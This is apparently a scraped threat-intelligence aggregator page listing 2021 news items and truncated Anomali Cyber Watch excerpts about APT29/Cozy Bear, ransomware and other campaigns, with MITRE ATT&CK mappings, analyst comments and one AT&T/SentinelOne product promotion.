MITRE ATT&CK: [MITRE ATT&CK] File and Directory Discovery - T1083 | [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] Data Encrypted for Impact - T1486 | [MITRE ATT&CK] Exfiltration Over Alternative Protocol - T1048
Tags: Exmatter, BlackMatter, Darkside, Ransomware, Exfiltration, Data loss prevention
Iran Says Israel, U.S. Likely Behind Cyberattack on Gas Stations
(published: October 31, 2021)
Iranian General Gholamreza Jalali, head of Iran’s passive defense organization, went to state-run television to blame Israel and the U.S. for an October 26, 2021 cyberattack that paralyzed gasoline stations across the country. The attack on the fuel distribution chain in Iran forced the shutdown of a network of filling stations. The incident disabled government-issued electronic cards providing subsidies that tens of millions of Iranians use to purchase fuel at discounted prices. Jalali said the attack bore similarities to cyber strikes on Iran’s rail network and the Shahid Rajaee port. The latest attack displayed a message reading "cyberattack 64411" on gas pumps when people tried to use their subsidy cards. Similarly, in July 2021, attackers targeting Iranian railroad prompted victims to call 64411, the phone number for the office of Supreme Leader Ali Khamenei.
Analyst Comment: Iran has not provided evidence behind the attribution, so |
Ransomware Malware Tool Threat Guideline | APT 29 APT 29 | |
|
2021-10-25 11:41:33 | Russia-linked Nobelium APT targets orgs in the global IT supply chain (lien direct) | Russia-linked Nobelium APT group has breached at least 14 managed service providers (MSPs) and cloud service providers since May 2021. The SolarWinds security breach was not isolated, Russia-linked Nobelium APT group has targeted140 managed service providers (MSPs) and cloud service providers and successfully breached 14 of them since May 2021. The NOBELIUM APT (APT29, Cozy Bear, and […] | APT 29 | ||
|
2021-10-12 17:41:00 | Anomali Cyber Watch: Aerospace and Telecoms Targeted by Iranian MalKamak Group, Cozy Bear Refocuses on Cyberespionage, Wicked Panda is Traced by Malleable C2 Profiles, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Data leak, Ransomware, Phishing, and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Russian Cyberattacks Pose Greater Risk to Governments and Other Insights from Our Annual Report
(published: October 7, 2021)
Approximately 58% of all nation-state attacks observed by Microsoft between July 2020 and June 2021 have been attributed to the Russian-sponsored threat groups, specifically to Cozy Bear (APT29, Nobelium) associated with the Russian Foreign Intelligence Service (SVR). The United States, Ukraine, and the UK were the top three targeted by them. Russian Advanced Persistent Threat (APT) actors increased their effectiveness from a 21% successful compromise rate to a 32% rate comparing year to year. They achieve it by starting an attack with supply-chain compromise, utilizing effective tools such as web shells, and increasing their skills with the cloud environment targeting. Russian APTs are increasingly targeting government agencies for intelligence gathering, which jumped from 3% of their targets a year ago to 53% – largely agencies involved in foreign policy, national security, or defense. Following Russia by the number of APT cyberattacks were North Korea (23%), Iran (11%), and China (8%).
Analyst Comment: As the collection of intrusions for potential disruption operations via critical infrastructure attacks became too risky for Russia, it refocused back to gaining access to and harvesting intelligence. The scale and growing effectiveness of the cyberespionage requires a defence-in-depth approach and tools such as Anomali Match that provide real-time forensics capability to identify potential breaches and known actor attributions.
MITRE ATT&CK: [MITRE ATT&CK] Supply Chain Compromise - T1195 | [MITRE ATT&CK] Server Software Component - T1505 | [MITRE ATT&CK] Phishing - T1566 | [MITRE ATT&CK] Brute Force - T1110
Tags: Fancy Bear, APT28, APT29, The Dukes, Strontium, Nobelium, Energetic Bear, Cozy Bear, Government, APT, Russia, SVR, China, North Korea, USA, UK, Ukraine, Iran
Ransomware in the CIS
(published: October 7, 2021)
Many prominent ransomware groups have members located in Russia and the Commonwealth of Independent States (CIS) - and they avoid targeting this region. Still, businesses in the CIS are under the risk of being targeted by dozens of lesser-known ransomware groups. Researchers from Kaspersky Labs have published a report detailing nine business-oriented ransomware trojans that were most active in the CIS in the first half of 2021. These ransomware families are BigBobRoss (TheDMR), Cryakl (CryLock), CryptConsole, Crysis (Dharma), Fonix (XINOF), Limbozar (VoidCrypt), Phobos (Eking), Thanos (Hakbit), and XMRLocker. The oldest, Cryakl, has been around since April 2014, and the newest, XMRLocker, was first detected in August 2020. Most of them were mainly distributed via the cracking of Remote Deskto |
Ransomware Malware Tool Threat Guideline Prediction | APT 41 APT 41 APT 39 APT 29 APT 29 APT 28 | |
|
2021-07-31 18:00:04 | SolarWinds hackers breached 27 state attorneys\' offices (lien direct) | Microsoft Office 365 email accounts of employees at 27 US Attorneys’ offices were breached by the Russia-linked SVR group as part of the SolarWinds hack, DoJ warns. The US Department of Justice revealed that the Microsoft Office 365 email accounts of employees at 27 US Attorneys’ offices were hacked by the Russia-linked SVR (aka APT29, Cozy Bear, and The Dukes) during the SolarWinds attack. The […] | APT 29 | ||
|
2021-07-30 15:25:25 | Russia\'s APT29 Still Actively Delivering Malware Used in COVID-19 Vaccine Spying (lien direct) | The Russian cyberespionage group known as APT29 and Cozy Bear is still actively delivering a piece of malware named WellMess, despite the fact that the malware was exposed and detailed last year by Western governments. | Malware | APT 29 APT 29 | |
|
2021-07-30 03:00:54 | Experts Uncover Several C&C Servers Linked to WellMess Malware (lien direct) | Cybersecurity researchers on Friday unmasked new command-and-control (C2) infrastructure belonging to the Russian threat actor tracked as APT29, aka Cozy Bear, that has been spotted actively serving WellMess malware as part of an ongoing attack campaign.
More than 30 C2 servers operated by the Russian foreign intelligence have been uncovered, Microsoft-owned cybersecurity subsidiary RiskIQ said |
Malware Threat | APT 29 | |
 |
2021-07-29 10:00:46 | APT trends report Q2 2021 (lien direct) | This is our latest summary of advanced persistent threat (APT) activity, focusing on significant events that we observed during Q2 2021: attacks against Microsoft Exchange servers, APT29 and APT31 activities, targeting campaigns, etc. | Threat | APT 29 APT 31 | |
 |
2021-07-01 10:47:40 | Smashing Security podcast #234: Cozy Bear, dildo scams, and robo hires and fires (lien direct) | Microsoft warns about a hacking gang that is far from cuddly, algorithms rather than managers are firing people, and our guest receives a surprising email from "Amazon"... And you will NOT want to miss checking out a very special "Pick of the week"! All this and much more is discussed in the latest edition of the award-winning "Smashing Security" podcast by computer security veterans Graham Cluley and Carole Theriault, joined this week by David Bisson. | APT 29 | ||
|
2021-06-26 16:36:51 | Microsoft: Russia-linked SolarWinds hackers breached three new entities (lien direct) | Microsoft discovered that Russia-linked SolarWinds hackers, tracked as Nobelium, have breached the network of three new organizations. Microsoft revealed on Friday that Russia-linked SolarWinds hackers, tracked as Nobelium or APT29, have conducted news cyber attacks against other organizations. Threat actors carried out brute-force and password spraying attacks in an attempt to gain access to Microsoft customer accounts. […] | Threat | APT 29 | |
|
2021-06-08 15:00:00 | Anomali Cyber Watch: TeamTNT Actively Enumerating Cloud Environments to Infiltrate Organizations, Necro Python Bots Adds New Tricks, US Seizes Domains Used by APT29 and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, APT29, FluBot, Necro Python, RoyalRoad, SharpPanda, TeaBot and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this magazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
TeamTNT Actively Enumerating Cloud Environments to Infiltrate Organizations
(published: June 4, 2021)
Researchers at Palo Alto have identified a malware repo belonging to TeamTNT, the prominent cloud focused threat group. The repo shows the expansion of TeamTNTs abilities, and includes scripts for scraping SSH keys, AWS IAM credentials and searching for config files that contain credentials. In addition to AWS credentials, TeamTNT are now also searching for Google Cloud credentials, which is the first instance of the group expanding to GCP.
Analyst Comment: Any internal only cloud assets & SSH/Privileged access for customer facing cloud infrastructure should only be accessible via company VPN. This ensures attackers don’t get any admin access from over the internet even if keys or credentials are compromised. Customers should monitor compromised credentials in public leaks & reset the passwords immediately for those accounts.
MITRE ATT&CK: [MITRE ATT&CK] Permission Groups Discovery - T1069
Tags: AWS, Cloud, Credential Harvesting, cryptojacking, Google Cloud, IAM, scraping, TeamTnT, Black-T, Peirates
Necro Python Bots Adds New Tricks
(published: June 3, 2021)
Researchers at Talos have identified updated functionality in the Necro Python bot. The core functionality is the same with a focus on Monero mining, however exploits to the latest vulnerabilities have been added. The main payloads are XMRig, traffic sniffing and DDoS attacks. Targeting small and home office routers, the bot uses python to support multiple platforms.
Analyst Comment: Users should ensure they always apply the latest patches as the bot is looking to exploit unpatched vulnerabilities. Users need to change default passwords for home routers to ensure potential malware on your personal devices don’t spread to your corporate devices through router takeover.
MITRE ATT&CK: [MITRE ATT&CK] Scripting - T1064 | [MITRE ATT&CK] Obfuscated Files or Information - T1027 | [MITRE ATT&CK] Process Injection - T1055 | [MITRE ATT&CK] Input Capture - T1056 | [MITRE ATT&CK] Exploit Public-Facing Application - T1190 | [MITRE ATT&CK] Remote Access Tools - T1219
Tags: Bot, botnet, Exploit, Monero, Necro Python, Python, Vulnerabilities, XMRig
New SkinnyBoy Ma |
Ransomware Malware Vulnerability Threat Patching Guideline | APT 29 APT 28 | |
|
2021-06-02 07:46:43 | US seizes 2 domains used by APT29 in a recent phishing campaign (lien direct) | The US DoJ seized two domains used by APT29 group in recent attacks impersonating the U.S. USAID to spread malware. The US Department of Justice (DoJ) and the Federal Bureau of Investigation have seized two domains used by the Russia-linked APT29 group in spear-phishing attacks that targeted government agencies, think tanks, consultants, and NGOs. Russia-linked […] | APT 29 | ||
|
2021-06-01 16:56:57 | US seizes domains used by APT29 in recent USAID phishing attacks (lien direct) | The US Department of Justice has seized two Internet domains used in recent phishing attacks impersonating the U.S. Agency for International Development (USAID) to distribute malware and gain access to internal networks. [...] | Malware | APT 29 | ★★★ |
|
2021-05-12 21:55:00 | Anomali Cyber Watch: Cozy Bear TTPs, Darkside Ransomware Shuts Down US Pipeline, Operation TunnelSnake Uses New Moriya Rootkit, and More (lien direct) | The various threat intelligence stories in this iteration of the Anomali Cyber Watch discuss the following topics: APT, Fileless Malware, Malspam, Phishing, Ransomware, Rootkits, Targeted Attacks and Vulnerabilities. The IOCs related to these stories are attached to Anomali Cyber Watch and can be used to check your logs for potential malicious activity.
Figure 1 - IOC Summary Charts. These charts summarize the IOCs attached to this agazine and provide a glimpse of the threats discussed.
Trending Cyber News and Threat Intelligence
Darkside Ransomware Caused Major US Pipeline Shutdown
(published: May 8, 2021)
DarkSide ransomware attack caused Colonial Pipeline to shut down the biggest US gasoline pipeline on Friday, May 7th, 2021. The pipeline is the main source of gasoline, diesel and jet fuel for the US East Coast and runs from Texas to Tennessee and New Jersey serving up to 50 Million people. DarkSide group began their attack against the company a day earlier, stealing nearly 100 gigabytes of data before locking computers with ransomware and demanding payment.
Analyst Comment: While DarkSide's first known activity goes back only to August 2020, it is likely backed by experienced Eastern-European actors. Ransomware protection demands a multi-layered approach to include isolation, air-gaps, backup solutions, anti-phishing training and detection.
MITRE ATT&CK: [MITRE ATT&CK] Data Encrypted for Impact - T1486 | [MITRE ATT&CK] Inhibit System Recovery - T1490 | [MITRE ATT&CK] Scripting - T1064
Tags: DarkSide, ransomware, Oil and Gas, USA, Colonial Pipeline
Revealing The 'Cnip3' Crypter, A Highly Evasive RAT Loader
(published: May 7, 2021)
Morphisec has discovered a new stealthy crypter as a service dubbed Snip3. Its advanced anti-detection techniques include: 1) Executing PowerShell code with the ‘remotesigned’ parameter. 2) Validating the existence of Windows Sandbox and VMWare virtualization. 3) Using Pastebin and top4top for staging. 4) Compiling RunPE loaders on the endpoint in runtime. Several hackers were observed using Snip3 to deliver various payloads: AsyncRAT, NetWire RAT, RevengeRAT, and Agent Tesla.
Analyst Comment: The Snip3 Crypter’s ability to identify sandboxing and virtual environments make it especially capable of bypassing detection-centric solutions. It shows the value of investing in complex cybersecurity solutions.
MITRE ATT&CK: [MITRE ATT&CK] Virtualization/Sandbox Evasion - T1497 | [MITRE ATT&CK] Command-Line Interface - T1059 | [MITRE ATT&CK] Process Injection - T1055
Tags: Snip3, crypter, Crypter-as-a-Service, VBS, RAT, AsyncRAT, NetWire RAT, RevengeRAT, Agent Tesla, NYANxCAT
Lemon Duck target Microsoft Exchange Servers, Incorporate New TTPs
(published: May 7, 2021)
The Lemon Duck cryptomining group has been active since at least |
Ransomware Malware Threat | APT 29 APT 29 | |
|
2021-05-07 21:03:42 | Russia-linked APT29 group changes TTPs following April advisories (lien direct) | The UK and US cybersecurity agencies have published a report detailing techniques used by Russia-linked cyberespionage group known APT29 (aka Cozy Bear). Today, UK NCSC and CISA-FBI-NSA cybersecurity agencies published a joint security advisory that warns organizations to patch systems immediately to mitigate the risk of attacks conducted by Russia-linked SVR group (aka APT29, Cozy Bear, and The Dukes)). The […] | APT 29 | ||
 |
2021-05-07 10:15:00 | NCSC, CISA publish new information on Russia\'s Cozy Bear (lien direct) | Pas de details / No more details | APT 29 APT 29 | ||
|
2021-04-27 19:33:22 | FBI/DHS Issue Guidance for Network Defenders to Mitigate Russian Gov Hacking (lien direct) | The FBI and DHS have issued a Joint Cybersecurity Advisory on the threat posed by the Russian Foreign Intelligence Service (SVR) via the cyber actor known as APT 29 (aka the Dukes, Cozy Bear, Yttrium and CozyDuke). | Threat | APT 29 APT 29 | |
|
2021-04-26 11:16:34 | US warns of Russian state hackers still targeting US, foreign orgs (lien direct) | The FBI, the US Department of Homeland Security (DHS), and the Cybersecurity and Infrastructure Security Agency (CISA) warned today of continued attacks coordinated by the Russian-backed APT 29 hacking group against US and foreign organizations. [...] | APT 29 | ||
|
2021-04-22 10:00:00 | Researchers shed more light on APT29 activity during SolarWinds attack (lien direct) | Pas de details / No more details | APT 29 | ★★★★ | |
 |
2021-04-19 20:38:00 | Introducing AT&T\'s Managed Endpoint Security with SentinelOne (lien direct) | With 5G, edge solutions, and digital transformation all around us, every enterprise should be taking a closer look at their endpoint security and evaluate options that will be able to keep pace with this dynamic new environment.The newly introduced AT&T Managed Endpoint Security with SentinelOne™ offer brings world class managed services with comprehensive endpoint security. SentinelOne brings best-of-breed Endpoint Protection Platform (EPP) and Endpoint Detection and Response (EDR) with deep integration into the AT&T Unified Security Management (USM) platform and Alien Labs Open Threat Exchange (OTX). This deep integration, along with AT&T’s 500+ partner integrations, can provide businesses Extended Detection and Response (XDR) capabilities from the endpoint to the network to the cloud. Plus, through the AT&T Security Operations Center, businesses can rely on world class monitoring and management of their endpoints. Here are the unique benefits it can bring to enterprises: Industry leading technology Joining forces with the best of the best is crucial especially when it comes to endpoint security. AT&T has teamed up with SentinelOne who provides next-generation endpoint security combining antivirus, EPP, and EDR into one agent. SentinelOne has been highly recognized in the industry and was number 1 in the 2020 MITRE ATT&CK test - APT 29 for most total detections and most correlated alerts through comprehensive storyline technology. This autonomous agent utilizes Artificial Intelligence (AI) and machine learning (ML) to help protect against known and unknown threats and eliminates reliance on external factors for protection. This faster, “machine-speed” detection & response provides continuous protection, even when offline. And, in the event of an attack, the SentinelOne agent can perform 1-click remediation and rollback with no custom scripting or re-imaging required. Deep integration with AT&T’s USM platform and Alien Labs OTX AT&T Cybersecurity and SentinelOne bring one of the most unique combinations in the market via the deep integrations between the SentinelOne platform and the AT&T USM platform. This deep integration allows for orchestrated and automated incident response on the endpoints. Additionally, deep integrations were built between the world’s largest open threat intelligence community, AT&T Alien Labs Open Threat Exchange (OTX), and the SentinelOne agent. The AT&T Alien Labs OTX encompasses over 145,000 security professionals submitting over 20 million threat indicators per day. Additional context is provided from the USM sensor network with an additional 20 million threat observations per day and AT&T’s Chief Security Office analyzing over 446 PB of traffic from 200 countries and territories. By correlating the incidents of compromise from AT&T Alien Labs OTX, AT&T is able to deliver added context that allows for faster responses. These same AT&T Alien Labs detections and threat intelligence also informs threat hunting on SentinelOne’s EDR data to help yield richer insights and easier detection of evasive threats. Expert management As one of the world's top MSSPs, AT&T Cybersecurity employs highly experienced and industry certified individuals for the Managed Endpoint Security with SentinelOne offering. AT&T brings over 25 years of experience in delivering managed security services and knows what it takes to keep pace with the dynamic threat landscape. To stay ahead, AT&T’s security analysts maintain security certifications including GSE, CISSP, CEH, and more. For the Managed Endpoint Security with SentinelOne offering, AT&T | Data Breach Threat Guideline | APT 29 | |
 |
2021-04-16 18:10:09 | NSA: 5 Security Bugs Under Active Nation-State Cyberattack (lien direct) | Widely deployed platforms from Citrix, Fortinet, Pulse Secure, Synacor and VMware are all in the crosshairs of APT29, bent on stealing credentials and more. | APT 29 |
To see everything:
Our RSS (filtrered)
